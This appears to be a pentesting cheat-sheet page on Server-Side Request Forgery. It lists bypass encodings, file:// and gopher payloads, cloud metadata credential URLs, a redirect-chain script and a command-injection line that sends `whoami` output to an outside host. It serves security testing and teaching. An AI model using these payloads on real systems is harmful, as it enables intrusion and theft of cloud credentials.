SSRF (Server-Side Request Forgery)

A Server-Side Request Forgery (SSRF) vulnerability occurs when an attacker manipulates a server-side application into making HTTP requests to a domain of their choice, exposing the server to arbitrary external or internal requests.

Capturing SSRF Interactions

The first step is capturing an SSRF interaction you generate. Use tools such as:

Whitelisted Domain Bypasses

SSRF is often restricted to whitelisted domains. Common bypass techniques:

# Open redirect chain
https://victim.com/redirect?url=http://169.254.169.254/

# Using @ in URL
http://[email protected]/

# IPv6 encoding
http://[::1]:80/

# Decimal IP encoding
http://2130706433/  (127.0.0.1)

# Octal encoding
http://0177.0.0.1/

Supported Protocols

file://

Directly access local files:

file:///etc/passwd
file:///C:/Windows/System32/drivers/etc/hosts

dict://

Access DICT protocol servers:

dict://<host>:<port>/d:<word>:<database>:<n>

gopher://

Send raw TCP bytes to any service. Useful for attacking Redis, SMTP, internal APIs:

# Gopher SMTP
ssrf.php?url=gopher://127.0.0.1:25/xHELO%20localhost%250d%250aMAIL%20FROM%3A...

# Gopher HTTP
gopher://<server>:8080/_GET / HTTP/1.0%0A%0A
gopher://<server>:8080/_POST%20/x%20HTTP/1.0%0ACookie: eatme%0A%0Abody

Use Gopherus to generate Gopher payloads for:

MySQL, PostgreSQL, FastCGI, Redis, Zabbix, Memcache

SFTP, TFTP, LDAP

sftp://generic.com:11111/
ssrf.php?url=tftp://generic.com:12346/TESTUDPPACKET
ldap://localhost:11211/%0astats%0aquit

SSRF via Special Headers

# Referrer header (analytics tools often visit URLs in Referer)
Referer: http://169.254.169.254/latest/meta-data/

# SNI field (misconfigured Nginx proxy)
openssl s_client -connect target.com:443 -servername "internal.host.com" -crlf

SSRF via TLS AIA CA Issuers (Java mTLS)

Some TLS stacks auto-download missing intermediate CAs using the Authority Information Access (AIA) → CA Issuers URI inside the peer certificate. In Java, enabling -Dcom.sun.security.enableAIAcaIssuers=true makes the server dereference attacker-controlled URIs during the TLS handshake, before any HTTP logic runs.

# Trigger SSRF via crafted client certificate AIA field
curl https://mtls-server:8444 \
  --key client-aia-key.pem \
  --cert client-aia-localhost-cert.pem \
  --cacert ca-cert.pem
# Server will fetch: http://localhost:8080 (attacker-controlled URL in AIA)

# DoS via file://
# Setting AIA CA Issuers to file:///dev/urandom makes Java read unbounded bytes

Misconfigured Proxy SSRF

# Flask proxy (@-based bypass)
GET @evildomain.com/ HTTP/1.1
Host: target.com

# Spring Boot (;-based bypass)
GET ;@evil.com/url HTTP/1.1
Host: target.com

# Reverse proxy accepting absolute URLs (open forward proxy)
GET http://127.0.0.1:8080/ HTTP/1.1
Host: whatever
Connection: close

Cloud SSRF Exploitation

In cloud environments, SSRF can access metadata endpoints:

# AWS
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/

# GCP
http://metadata.google.internal/computeMetadata/v1/
# (requires: Metadata-Flavor: Google header via Gopher)

# Azure
http://169.254.169.254/metadata/instance?api-version=2021-02-01

When you cannot see the response:

Time-Based
DNS-Based
Status Code Exploitation

Check timing of server responses to determine if a resource exists:

Requests to existing internal hosts may respond faster or slower.
Use timing differences to map internal networks.

Use an out-of-band DNS interaction to confirm SSRF:

http://attacker-burp-collaborator.net/

Any DNS query confirms the vulnerability.

According to research, sending redirect responses (305–309) in a SSRF chain can cause the application to enter an error mode that prints the full response:

@app.route("/redir")
def redir():
    count = int(request.args.get("count", 0)) + 1
    weird_status = 301 + count
    if count >= 10:
        return redirect(METADATA_URL, 302)
    return redirect(f"/redir?count={count}", weird_status)

Libraries like TCPDF and html2pdf automatically fetch URLs present in HTML while rendering a PDF:

<html>
  <body>
    <img width="1" height="1" src="http://127.0.0.1:8080/healthz">
    <link rel="stylesheet" type="text/css" href="http://10.0.0.5/admin" />
  </body>
</html>

DNS Rebinding CORS/SOP Bypass

DNS rebinding can be used to bypass CORS/SOP restrictions when exfiltrating content from local IPs:

Victim visits attacker’s page
Attacker changes DNS to point to internal IP (TTL=0)
Subsequent requests from victim’s browser go to internal service
Content is exfiltrated

Tool: Singularity of Origin

SSRF to RCE Chains

# SSRF + Command Injection in URL
url=http://collaborator.net?`whoami`

# SSRF via PDF rendering
# Inject JS that makes the PDF generator perform requests

Tools

SSRFMap — Detect and exploit SSRF
Gopherus — Generate Gopher payloads
SSRF Proxy — Tunnel traffic through SSRF
remote-method-guesser — Java RMI SSRF payloads

Web Pentesting

Network Services

SSRF (Server-Side Request Forgery)

Capturing SSRF Interactions

Whitelisted Domain Bypasses

Supported Protocols

SSRF via Special Headers

SSRF via TLS AIA CA Issuers (Java mTLS)

Misconfigured Proxy SSRF

Cloud SSRF Exploitation

Blind SSRF

HTML-to-PDF Renderers as Blind SSRF Gadgets

DNS Rebinding CORS/SOP Bypass

SSRF to RCE Chains

Tools

Build docs developers (and LLMs) love

Web Pentesting

Network Services

​Capturing SSRF Interactions

​Whitelisted Domain Bypasses

​Supported Protocols

​SSRF via Special Headers

​SSRF via TLS AIA CA Issuers (Java mTLS)

​Misconfigured Proxy SSRF

​Cloud SSRF Exploitation

​Blind SSRF

​HTML-to-PDF Renderers as Blind SSRF Gadgets

​DNS Rebinding CORS/SOP Bypass

​SSRF to RCE Chains

​Tools

Build docs developers (and LLMs) love

Capturing SSRF Interactions

Whitelisted Domain Bypasses

Supported Protocols

SSRF via Special Headers

SSRF via TLS AIA CA Issuers (Java mTLS)

Misconfigured Proxy SSRF

Cloud SSRF Exploitation

Blind SSRF

HTML-to-PDF Renderers as Blind SSRF Gadgets

DNS Rebinding CORS/SOP Bypass

SSRF to RCE Chains

Tools